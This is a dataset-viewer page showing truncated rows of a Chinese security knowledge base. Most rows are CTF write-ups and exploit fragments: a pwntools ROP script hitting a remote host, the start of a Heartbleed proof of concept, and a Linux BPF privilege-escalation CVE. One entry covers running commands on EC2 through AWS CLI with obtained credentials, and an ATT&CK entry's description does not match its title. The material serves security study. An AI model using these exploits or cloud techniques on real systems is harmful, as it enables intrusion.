所有课程从基础开始(包括工具的介绍,应用等,由于是基础开始,部分内容可能会涉及初级知识点,请见谅),这样以后新来的同事或者想... | sec-knowleage |
# stringmaster1
PWN
## Description:
> Eat, sleep, swap, replace
```c++
#include <iostream>
#include <cstdlib>
#include <ctime>
#include <vector>
#include <unistd.h>
#include <limits>
using namespace std;
const string chars = "abcdefghijklmnopqrstuvwxy";
void spawn_shell() {
char* args[] = {(char*)"/bin/bash", NULL}... | sec-knowleage |
# 计算机操作系统 - 概述
<!-- GFM-TOC -->
* [计算机操作系统 - 概述](#计算机操作系统---概述)
* [基本特征](#基本特征)
* [1. 并发](#1-并发)
* [2. 共享](#2-共享)
* [3. 虚拟](#3-虚拟)
* [4. 异步](#4-异步)
* [基本功能](#基本功能)
* [1. 进程管理](#1-进程管理)
* [2. 内存管理](#2-内存管理)
* [3. 文件管理](#3-文件管理)
* [4. 设备管理](#4-设备管理)
... | sec-knowleage |
# Midnight Sun CTF Finals 2018
Team: c7f.m0d3, shalom, msm, chivay, akrasuski1
### Table of contents
* [Mimisbrunnr (web)](mimisbrunnr_web)
* [Pagerank (web)](pagerank_web)
* [Badchair (crypto)](badchair_crypto)
* [Crawling Code Creature (re/for)](crawling_for)
* [Encrypted espionage equipment (re)](encrypted_espionage... | sec-knowleage |
## jareCaptcha (web/ppc, 200 points, 32 solves)

After solving a sudoku and entering the correct captcha we get `You have solved 1 sudokus, just 199 to go!`
Solving sudokus is easy, ocr-ing captchas is the hard part, and with 200 puzzles, doing it manually is not a possibility.
The current captcha ... | sec-knowleage |
---
title: CVE-2022-23222
---
<center><h1>CVE-2022-23222</h1><b>本文作者:一生热爱</b><br><br></center>
---
## 一、描述
Linux 内核的 BPF 验证器(kernel/bpf/verifier.c)的 adjust_ptr_min_max_vals() 中存在安全问题,对执行指针运算的 *_OR_NULL 指针类型缺少检查,这可以用来绕过验证器的检查并提升权限。
## 二、影响范围
5.8.0 <= Linux 内核 <= 5.16
## 三、缓解措施
```bash
sudo sysctl kernel.unprivileged_bpf... | sec-knowleage |
setsid
===
在新的会话中运行程序
## 补充说明
**setsid命令** 子进程从父进程继承了:SessionID、进程组ID和打开的终端。子进程如果要脱离这些,代码中可通过调用setsid来实现。,而命令行或脚本中可以通过使用命令setsid来运行程序实现。setsid帮助一个进程脱离从父进程继承而来的已打开的终端、隶属进程组和隶属的会话。
### 语法
```shell
setsid[options] <program> [arguments ...]
```
### 选项
```shell
-c, --ctty 将控制终端设置为当前控制终端
-f, --fork 总是 fork
-w, --wait ... | sec-knowleage |
# Login App
Web, 473 points
## Description:
A link to a website was provided.
```html
<html>
<head>
<title>TAMUctf</title>
<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
<style class="cp-pen-styles">@import url(https://fonts.googleapis.com/css?family=Roboto:300);
<!-- ... unimpo... | sec-knowleage |
# Reducer
### 什么是Reducer
Store 收到 Action 以后,必须给出一个新的 State,这样 View 才会发生变化。这种 State 的计算过程就叫做 Reducer
### Reducer模板
```jss
const reducer = function (state, action) {
// ...
return new_state;
```
### Reducer的使用
Reducer 是一个函数,它接受 Action 和当前 State 作为参数,返回一个新的 State
```js
const reducer = (state = 0, action) => {
switch (ac... | sec-knowleage |
iptraf
===
实时地监视网卡流量
## 补充说明
**iptraf命令** 可以实时地监视网卡流量,可以生成网络协议数据包信息、以太网信息、网络节点状态和ip校验和错误等信息。
### 语法
```shell
iptraf(选项)
```
### 选项
```shell
-i网络接口:立即在指定网络接口上开启IP流量监视;
-g:立即开始生成网络接口的概要状态信息;
-d网络接口:在指定网络接口上立即开始监视明细的网络流量信息;
-s网络接口:在指定网络接口上立即开始监视TCP和UDP网络流量信息;
-z网络接口:在指定网络接口上显示包计数;
-l网络接口:在指定网络接口上立即开始监视局域网工作站信息;
-t时间:指定i... | sec-knowleage |
<!-- GFM-TOC -->
* [一、基础](#一基础)
* [二、创建表](#二创建表)
* [三、修改表](#三修改表)
* [四、插入](#四插入)
* [五、更新](#五更新)
* [六、删除](#六删除)
* [七、查询](#七查询)
* [DISTINCT](#distinct)
* [LIMIT](#limit)
* [八、排序](#八排序)
* [九、过滤](#九过滤)
* [十、通配符](#十通配符)
* [十一、计算字段](#十一计算字段)
* [十二、函数](#十二函数)
* [汇总](#汇总)
* [文本处理](#文本处理)
* [日期和时间处理](#日期和时间处... | sec-knowleage |
# IO模型
> 注 : 笔记中拓扑图 drawio 源文件在其图片目录下
---
IO 其实就是 Input 和 Output,在操作系统中就对应数据流的输入与输出。这个数据流的两端,可以是文件,也可以是网络的一台主机。但无论是文件,还是网络主机,其传输都是类似的,我们今天就以源头为文件进行说明。
一个文件要从磁盘到我们的内存,需要经过很复杂的操作。首先,需要将数据从硬件读取出来,然后放入操作系统内核缓冲区,之后再将数据拷贝到程序缓冲区,最后应用程序才能读取到这个文件。简单地说,无论什么 IO 模型,其读取过程总会经历下面两个阶段:
* 等待数据到达内核缓冲区
* 从内核缓冲区拷贝数据到程序缓冲区
Linux 根据这两个阶段的是否... | sec-knowleage |
[Leetcode 题解](https://github.com/CyC2018/CS-Notes/blob/master/notes/Leetcode%20%E9%A2%98%E8%A7%A3%20-%20%E7%9B%AE%E5%BD%95.md) | sec-knowleage |
### Blockchain Security Overview
> 区块链安全近几年发展比较迅速,但是 wiki 上没有相关内容,遂拉了几个小伙伴,一起撰写了区块链安全相关内容,可能某些用词不是很准确,还请见谅,也可以提问 issue,会及时更改
概述区块链安全的一些方向,主要分为 **公链安全** 和 **智能合约** 安全 | sec-knowleage |
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import binascii
import re
from optparse import OptionParser
options = OptionParser(usag... | sec-knowleage |
<?php
include 'common.php';
if(empty($_POST['imagekey'])) {
header('Location: ?op=home');
exit();
}
$imagekey = $_POST['imagekey'];
$im = load_image($imagekey);
$w = imagesx($im);
$h = imagesy($im);
if($w > MAX_IM_SIZE || $h > MAX_IM_SIZE)
fatal("Invalid image dimensions.");
$nc = imagecolorstotal($im);... | sec-knowleage |
import hashlib
import itertools
import re
import sys
from crypto_commons.netcat.netcat_commons import nc, receive_until_match, send, interactive
def pow(suffix, data):
if 'sha1' in data:
func = hashlib.sha1
elif 'sha224' in data:
func = hashlib.sha224
elif 'sha256' in data:
func =... | sec-knowleage |
false
===
返回状态为失败。
## 概要
```shell
false
```
## 主要用途
- 用于和其他命令进行逻辑运算。
## 返回值
返回状态总是失败;返回值为1。
### 注意
1. 该命令是bash内建命令,相关的帮助信息请查看`help`命令。 | sec-knowleage |
from pwn import *
r = remote('110.10.212.139', 50410)
print r.recv()
r.send('$W337k!++y\n')
print r.recv()
print r.recv()
r.send('3\n')
print r.recv()
import struct
ra = struct.pack('<Q', 0x14000)
gadget = struct.pack('<Q', 0x014036)
shell = struct.pack('<Q', 0x14029)
cat = gadget + shell + ra
print cat.encod... | sec-knowleage |
---
title: 安装 CF
---
## 安装 CF
### HomeBrew 安装(使用于 Mac、Linux 用户)
```bash
brew tap teamssix/tap
brew install teamssix/tap/cf
```
### 下载二进制包
直接在 CF 下载地址:[github.com/teamssix/cf/releases](https://github.com/teamssix/cf/releases) 中下载系统对应的二进制文件,在命令行中运行即可,目前支持以下系统:
| 文件名 | 系统 | 架构 ... | sec-knowleage |
# -*- coding: utf-8 -*-
# @Time : 2021/12/23
# @Author : TesterCC
import json
from optparse import OptionParser
import re
import sys
from requests import session
# initialization
ret = dict()
ret['status'] = str()
ret['info'] = list()
ss = session()
ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, def... | sec-knowleage |
### Double Fetch概述
`Double Fetch` 从漏洞原理上属于条件竞争漏洞,是一种内核态与用户态之间的数据访问竞争。
在 Linux 等现代操作系统中,虚拟内存地址通常被划分为内核空间和用户空间。内核空间负责运行内核代码、驱动模块代码等,权限较高。而用户空间运行用户代码,并通过系统调用进入内核完成相关功能。通常情况下,用户空间向内核传递数据时,内核先通过通过 `copy_from_user ` 等拷贝函数将用户数据拷贝至内核空间进行校验及相关处理,但在输入数据较为复杂时,内核可能只引用其指针,而将数据暂时保存在用户空间进行后续处理。此时,该数据存在被其他恶意线程篡改风险,造成内核验证通过数据与实际使用数据不一致... | sec-knowleage |
# T1560-001-win-通过winrar压缩数据
## 来自ATT&CK的描述
攻击者可能会记录用户的键盘输入,以便在用户输入凭证时窃取。当操作系统凭证转储无效时,键盘记录很可能被用来获取新的访问机会,并可能要求攻击者在成功获取凭证之前,在系统上截取键盘输入很长一段时间。
键盘记录是最普遍的输入捕捉类型,有许多不同的截获键盘输入的方法。
钩住用于处理击键的API回调。与凭证API钩住不同,这只关注用于处理击键数据的API函数。
- 从硬件缓冲区读取原始击键数据。
- Windows注册表的修改。
- 自定义驱动程序。
- 修改系统镜像可能为攻击者提供网络设备操作系统的钩子,以读取登录会话的原始击键。
## 测试案例
### ... | sec-knowleage |
---
title: 利用 AWS CLI 执行命令
---
<center><h1>利用 AWS CLI 执行命令</h1></center>
---
当目标实例被 AWS Systems Manager 代理后,除了在控制台可以执行命令外,拿到凭证后使用 AWS 命令行也可以在 EC2 上执行命令。
列出目标实例 ID
```bash
aws ec2 describe-instances --filters "Name=instance-type,Values=t2.micro" --query "Reservations[].Instances[].InstanceId"
```
在对应的实例上执行命令,注意将 instanc... | sec-knowleage |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.